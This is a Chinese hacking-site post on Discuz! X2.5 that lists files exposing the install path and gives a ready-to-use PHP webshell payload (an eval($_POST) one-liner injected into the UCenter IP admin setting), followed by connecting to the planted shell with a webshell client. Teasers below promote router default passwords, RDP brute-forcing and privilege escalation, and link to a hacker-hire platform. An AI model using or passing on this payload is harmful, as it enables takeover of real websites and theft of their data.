discuz! x2.5爆路径漏洞及后台拿shell

hacker4年前 (2020-05-31)黑客文章1763

爆路径文件如下:

/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php

后台拿shell

需要有管理员帐号及密码，进入后台打开站长—-ucenter设置，直接在UCenter IP 地址:里面插入一句话

xxoo\\’);eval($_POST[a])?>;//

就ok ，然后菜刀连接 http://chnctocom/config/config_ucenter.php 密码a

标签: 黑客技术

返回列表

特别友情提示：最近路由器密码泄漏事件非常多，公布一组各类路由器默认账号密码,你是否中招？亲赶紧改密码吧！！品牌：ViKing 用户名:adsl 密码:adsl1234 品牌：实达默认IP：...

什么叫Hping？ Hping是网站渗透测试工作人员和IT安全性质量监督员应用的火爆的数据文件解决专用工具。Hping实质上是一个朝向cmd的TCP / IP数据文件汇编器和解析器。该专用工具适用各...

规矩，大家立即上基础教程，很少bb，这里有了你要想学习培训的网络黑客基础教程，浓浓的干货知识赠给大伙儿，沒有空话，现在开始！ ThinPHP5.1 程序运行系统漏洞...

什么叫Kismac？ KisMAC是wifi网络发觉黑客工具。虽然代码库是不一样的，但这类时兴的无线网络拦路虎出示了其名字Kismet的好多个作用。这一专用工具出示了一个好看的GUI，而且在Kism...

其实爆破服务器很简单的，也是必学的。 3389是一个远程桌面的端口，很多人为了更方便管理服务器，更新服务器上的资源等，经常会开启3389端口，用nastat-an命令可以查看该端口的开启。对...

1、提权的定义：将系统软件管理权限提高到root、 system 或是 administrator。 2、在网上提权的界定：取得网络服务器管理权限，而且取得成功登录网络服务器。可是，...

找黑客平台